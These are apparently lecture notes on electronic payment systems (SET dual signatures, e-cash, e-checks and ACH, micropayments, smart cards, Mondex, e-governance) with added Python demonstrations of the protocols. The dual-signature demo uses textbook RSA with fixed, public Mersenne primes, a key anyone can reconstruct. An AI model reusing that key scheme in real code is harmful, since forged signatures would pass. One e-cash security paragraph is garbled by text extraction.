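The dual-signature generation and verification described earlier, carried through the purchase phase of SET in which the cardholder hands the merchant (OI, H[PI], DS) and the payment gateway (PI, H[OI], DS), as an added example that is not part of the lecture notes. It assumes SHA-256 as the digest H and uses textbook RSA on two fixed Mersenne primes as a stand-in for the cardholder's certified signature key (real SET uses certificates and signature padding, neither modelled here); the order information and payment instruction are constructed.

```python
# Added example (not from the lecture notes): SET's dual signature, generated by the
# cardholder and verified separately by the merchant (who holds OI and H[PI]) and by
# the payment gateway (who holds PI and H[OI]). Textbook RSA on two fixed Mersenne
# primes stands in for the cardholder's certified signature key; this is an assumption
# for illustration, not SET's real key, certificate or padding handling.
import hashlib

_P = (1 << 521) - 1          # Mersenne prime M521 (demo key only)
_Q = (1 << 127) - 1          # Mersenne prime M127 (demo key only)
N = _P * _Q                  # ~648-bit modulus, larger than any SHA-256 digest
E = 65537                    # public exponent
D = pow(E, -1, (_P - 1) * (_Q - 1))   # private exponent (Python 3.8+)


def H(data: bytes) -> bytes:
    """The message digest H of the text; SHA-256 assumed here."""
    return hashlib.sha256(data).digest()


def dual_signature(pi: bytes, oi: bytes) -> int:
    """Cardholder: DS = Sign_private( H[ H[PI] || H[OI] ] )."""
    digest = H(H(pi) + H(oi))
    return pow(int.from_bytes(digest, "big"), D, N)


def recover_digest(ds: int) -> bytes:
    """D_RSA[ DS | key_public_sign,cardholder ]: undo the signature with the public key."""
    return pow(ds, E, N).to_bytes(32, "big")


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI] and DS; it never sees the card data inside PI."""
    return recover_digest(ds) == H(h_pi + H(oi))


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI, H[OI] and DS; it never sees the order inside OI."""
    return recover_digest(ds) == H(H(pi) + h_oi)


def purchase_request(pi: bytes, oi: bytes) -> dict:
    """Purchase phase: one DS, split into the merchant's part and the gateway's part."""
    ds = dual_signature(pi, oi)
    return {
        "to_merchant": {"OI": oi, "H_PI": H(pi), "DS": ds},
        "to_gateway": {"PI": pi, "H_OI": H(oi), "DS": ds},
    }


if __name__ == "__main__":
    # Constructed order information and payment instruction (no real card data).
    oi = b"order=42;item=book;amount=19.99"
    pi = b"card=TEST-CARD-0000;amount=19.99"
    msg = purchase_request(pi, oi)
    m, g = msg["to_merchant"], msg["to_gateway"]
    print(merchant_verify(m["OI"], m["H_PI"], m["DS"]))   # True
    print(gateway_verify(g["PI"], g["H_OI"], g["DS"]))    # True
    print(merchant_verify(b"order=42;item=book;amount=1.99", m["H_PI"], m["DS"]))  # False
```

The point to notice is that each party verifies the same DS from different inputs: the merchant recomputes the outer hash from H[PI] it was given plus H[OI] it computes itself, the gateway the other way round, so a change to either OI or PI breaks the check for the party that holds that part.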

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers
• Customers
• Merchants or traders
• Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.
• Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted in the networks.
• Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

(Figure: E-cash payment system model)

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the following steps.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.

In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

• E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.
• Like the serial numbers on real currency notes, the E-cash numbers are unique.
• It is issued by a bank and represents a specified sum of real money.
• It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.
• Anonymity is preserved unless double spending is attempted.
• Serial numbers can allow tracing to prevent money laundering.
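The three e-cash stages described above (account setup, purchase, authentication) together with the issuer's serial-number check that stops a token from being spent twice, as an added example that is not part of the lecture notes. The token format, the account balances and the HMAC issuer tag are assumptions of this example; the HMAC is only a stand-in for the issuer's digital signature and, unlike the blind-signature schemes the text alludes to, gives the customer no anonymity.

```python
# Added example (not from the lecture notes): an e-cash issuer that mints tokens with
# unique serial numbers and refuses to redeem the same serial twice. The token format,
# the HMAC tag (stand-in for the issuer's signature; no anonymity) and the balances
# are constructed for this demo.
from __future__ import annotations

import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    serial: str   # unique, like the serial number on a banknote
    value: int    # face value in the smallest currency unit
    tag: str      # issuer's authentication tag over serial and value


class Issuer:
    """The bank that mints tokens and later authenticates them for the merchant."""

    def __init__(self, key: bytes):
        self._key = key
        self.accounts: dict[str, int] = {}   # account setup: customer and merchant balances
        self._spent: set[str] = set()        # serials already redeemed (double-spend ledger)

    def open_account(self, name: str, balance: int) -> None:
        self.accounts[name] = balance

    def _tag(self, serial: str, value: int) -> str:
        return hmac.new(self._key, f"{serial}:{value}".encode(), hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, value: int) -> Token:
        """Issue a token: debit the customer's account and mint a fresh serial."""
        if self.accounts.get(customer, 0) < value:
            raise ValueError("insufficient funds")
        self.accounts[customer] -= value
        serial = secrets.token_hex(16)
        return Token(serial, value, self._tag(serial, value))

    def deposit(self, merchant: str, token: Token) -> bool:
        """Authentication stage: check the tag, refuse a reused serial, credit the merchant."""
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return False                      # forged or altered token
        if token.serial in self._spent:
            return False                      # double-spending attempt
        self._spent.add(token.serial)
        self.accounts[merchant] = self.accounts.get(merchant, 0) + token.value
        return True


def demo() -> tuple[bool, bool, bool]:
    """Purchase stage: the customer hands a token to the merchant, who deposits it.
    Returns (first deposit accepted, replay of the same token rejected, altered token rejected)."""
    bank = Issuer(secrets.token_bytes(32))
    bank.open_account("customer", 1000)
    bank.open_account("merchant", 0)
    token = bank.withdraw("customer", 250)
    first = bank.deposit("merchant", token)
    replay = bank.deposit("merchant", token)           # same serial presented again
    fresh = bank.withdraw("customer", 100)
    forged = bank.deposit("merchant", Token(fresh.serial, 999, fresh.tag))  # value altered
    return first, replay, forged


if __name__ == "__main__":
    print(demo())   # (True, False, False)
```

The ledger of spent serials is what the text's "serial numbers" buy the issuer: the merchant cannot tell a copied token from the original, so the issuer must be consulted at the authentication stage, and the first deposit wins.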

E-Cash Processing

E-cash security

Security is of extreme importance while handling the online transactions Faith in the security of

the medium of exchange whether paper or digital is essential for the economy to function

E-cash is much secure than other online payment modes because in this case no credential such

as card-passwords or anything such is involved Its like simply the online fund transfer from

customerrsquos account to traderrsquos account

PREPARED BY ARUN PRATAP SINGH 25

25

However while accessing the customerrsquos account the customer must keep in mind the internet

security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL

website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper

internet security softwares to keep aside the threats of malware evasdrooping and other security

threats

Advantages
• We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.
• Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
• E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations
• However secure the e-cash payment system may be, no one is safe against online fraud. In this case the fraudulent party is the trader: the trader may take the amount but not provide the services.
• While making the payment it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time (in general the refund time is at least 30-45 days).
• E-cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the usage of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make e-cash more nearly perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous uptake of online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business, and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer/bill payer) is prompted to authorize the electronic debit and enter the bank routing number (ABA) and account number.
2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards the approve/decline result to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
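As an added illustration of two of the checks described above (the routing and account number validation in step 4 of the CyberSource flow, and the "duplicate detection" item under protecting your business), the following Python is written for these notes and is not code from CyberSource, NACHA or any processor. It applies the public ABA routing-number check-digit rule and prefix ranges; the account-number format rule, the batch of records and the account numbers in it are constructed sample values.

```python
"""Two screening checks an e-check processor can run before a debit is
forwarded to the ACH network: ABA routing-number validation and
duplicate-presentment detection.  Added example for these notes, not
code from CyberSource or NACHA.  The batch below is constructed."""

# Leading two digits assigned by the ABA routing-number scheme to
# Federal Reserve districts (00-12), thrifts (21-32), electronic-only
# institutions (61-72) and traveler's checks (80).
_VALID_PREFIX_RANGES = ((0, 12), (21, 32), (61, 72), (80, 80))


def routing_number_is_valid(routing: str) -> bool:
    """ABA check digit: 3*(d1+d4+d7) + 7*(d2+d5+d8) + (d3+d6+d9) must be
    divisible by 10, and the first two digits must be in an assigned range."""
    if len(routing) != 9 or not routing.isdigit():
        return False
    prefix = int(routing[:2])
    if not any(lo <= prefix <= hi for lo, hi in _VALID_PREFIX_RANGES):
        return False
    d = [int(c) for c in routing]
    total = 3 * (d[0] + d[3] + d[6]) + 7 * (d[1] + d[4] + d[7]) + (d[2] + d[5] + d[8])
    return total % 10 == 0


def account_number_is_plausible(account: str) -> bool:
    """Account numbers carry no public checksum; a processor can only
    apply a format rule (assumed here: 4-17 digits) before the bank
    itself validates the account."""
    return account.isdigit() and 4 <= len(account) <= 17


def screen_batch(records: list) -> list:
    """Return one decision per record, in order.  A duplicate is the
    same routing/account/check number/amount presented more than once
    in the batch, e.g. a check scanned twice or a replayed message."""
    def key(r):
        return (r["routing"], r["account"], r["check_no"], r["amount_cents"])

    seen = set()
    decisions = []
    for r in records:
        if not routing_number_is_valid(r["routing"]):
            decisions.append("declined: bad routing number")
        elif not account_number_is_plausible(r["account"]):
            decisions.append("declined: malformed account number")
        elif key(r) in seen:
            decisions.append("declined: duplicate presentment")
        else:
            decisions.append("ok")
        seen.add(key(r))
    return decisions


# Constructed sample batch.  The routing numbers in the first two rows
# satisfy the ABA checksum; the third differs from the first in its
# last digit; the fifth row repeats the first row exactly.
SAMPLE_BATCH = [
    {"routing": "021000021", "account": "123456789", "check_no": 1001, "amount_cents": 4599},
    {"routing": "011000015", "account": "987654321", "check_no": 2002, "amount_cents": 12000},
    {"routing": "021000022", "account": "123456789", "check_no": 1002, "amount_cents": 500},
    {"routing": "021000021", "account": "12", "check_no": 1003, "amount_cents": 500},
    {"routing": "021000021", "account": "123456789", "check_no": 1001, "amount_cents": 4599},
]

if __name__ == "__main__":
    for rec, verdict in zip(SAMPLE_BATCH, screen_batch(SAMPLE_BATCH)):
        print(rec["check_no"], verdict)
```

The routing check catches keying errors and corrupted messages before anything is sent to the processor; the duplicate key deliberately includes the amount and check number so that two legitimately separate checks from the same account are not confused with a replay.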

Four Different Scenarios of the FSTC E-check System –

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based) and PayWord (post-payment).

MICRO PAYMENT IS -
• Very small payments made over the Web
• Transactions too small for credit cards
• Can be as little as a fraction of a cent
• Alternative to subscription and advertising
• Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
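The "accumulate many tiny payments, then settle once" idea in this scheme is what hash-chain micropayment protocols such as PayWord (named earlier as a post-payment method) achieve without a trusted wallet tracking every click. The following Python is an added example written for these notes, not code from the original slides or from any PayWord implementation. It assumes that the broker's signed commitment to the user's chain root is represented by a plain value, that each payword is worth one cent, and that user, vendor and broker run in one process.

```python
"""Hash-chain micropayments in the style of PayWord (post-payment).
Added example for these notes, not from the original slides or any
PayWord implementation.  Assumptions: the broker's signature over the
user's chain root is modelled as a plain value, each payword is worth
one cent, and all three parties run in this one process."""
import hashlib
import secrets

UNIT_CENTS = 1   # assumed value of one payword


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(length: int, seed: bytes = None) -> list:
    """User side: pick a random w_n and hash backwards so that
    w_i = h(w_{i+1}).  chain[0] is the root w_0 committed to the
    vendor; chain[i] is the i-th payword."""
    seed = seed if seed is not None else secrets.token_bytes(32)
    chain = [seed]
    for _ in range(length):
        chain.append(h(chain[-1]))
    chain.reverse()
    return chain


class Vendor:
    """Accepts paywords one at a time and settles once with the broker."""

    def __init__(self, root: bytes):
        self.root = root
        self.last = root
        self.count = 0   # index of the highest payword accepted so far

    def accept(self, payword: bytes, index: int) -> bool:
        # A payword for index i must hash back to the last accepted word
        # in exactly i - count steps; replayed, reordered or forged
        # words fail this check.
        steps = index - self.count
        if steps <= 0:
            return False
        x = payword
        for _ in range(steps):
            x = h(x)
        if x != self.last:
            return False
        self.last, self.count = payword, index
        return True

    def settlement_claim(self) -> dict:
        """Only the highest payword is presented to the broker: it
        proves all the smaller payments at once, so many micropayments
        become one larger transfer."""
        return {"root": self.root, "payword": self.last, "index": self.count,
                "amount_cents": self.count * UNIT_CENTS}


def broker_verify(claim: dict) -> bool:
    """Broker side: hashing the claimed payword index times must
    reproduce the root the user committed to."""
    x = claim["payword"]
    for _ in range(claim["index"]):
        x = h(x)
    return x == claim["root"]


def demo() -> dict:
    chain = make_chain(10, seed=b"constructed demo seed, not a real secret")
    vendor = Vendor(chain[0])
    outcomes = [
        vendor.accept(chain[1], 1),        # first cent
        vendor.accept(chain[2], 2),        # second cent
        vendor.accept(chain[2], 2),        # replay: rejected
        vendor.accept(chain[5], 5),        # three cents in one step
        vendor.accept(chain[4], 4),        # going backwards: rejected
        vendor.accept(h(b"forged"), 6),    # word not on the chain: rejected
    ]
    claim = vendor.settlement_claim()
    return {"outcomes": outcomes, "amount_cents": claim["amount_cents"],
            "broker_accepts": broker_verify(claim)}


if __name__ == "__main__":
    print(demo())
```

The vendor never contacts the broker during the session; each payment costs one hash to verify, and the single settlement message carries the whole amount, which is what makes per-cent pricing economical.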

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits on the customer side in using micropayments are speed and flexibility. On the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.
• Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
• Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
• Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment the customer receives access to the purchased product.
• Credit card: payment by credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).
• Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –
• Publishing
• Marketing
• Software
• Entertainment
• Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?
• Standard credit card-sized, with a microchip embedded on it
• Two types:
  o Memory-only chips
  o Microprocessor chips
• Can hold up to 32,000 bytes
• Newer smart cards have math co-processors
  o Perform complex encryption routines quickly
• In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –

Why Smart Cards –
• Improve the convenience and security of any transaction
• Provide tamper-proof storage of user and account identity
• Provide vital components of system security
• Protect against a full range of security threats

Advantages –
• Flexibility
• Security
• Portability
• Increasing data storage capacity
• Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications –
• Ticketless travel
  o Seoul bus system: 4M cards, 1B transactions since 1996
  o Planned for the SF Bay Area system
• Authentication, ID
• Medical records
• Ecash
• Store loyalty programs
• Personal profiles
• Government
  o Licenses
• Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards
• Transfer of electronic money over the Internet or telephone networks etc.
• Keep transaction records
• Password protection and "lock card" functions
• Portable balance finder to check balance
• Support multiple currencies

ADVANTAGES

CONSUMER –
• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT –
• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION –
• Strengthen customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this definition as congruent with e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and operating system independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

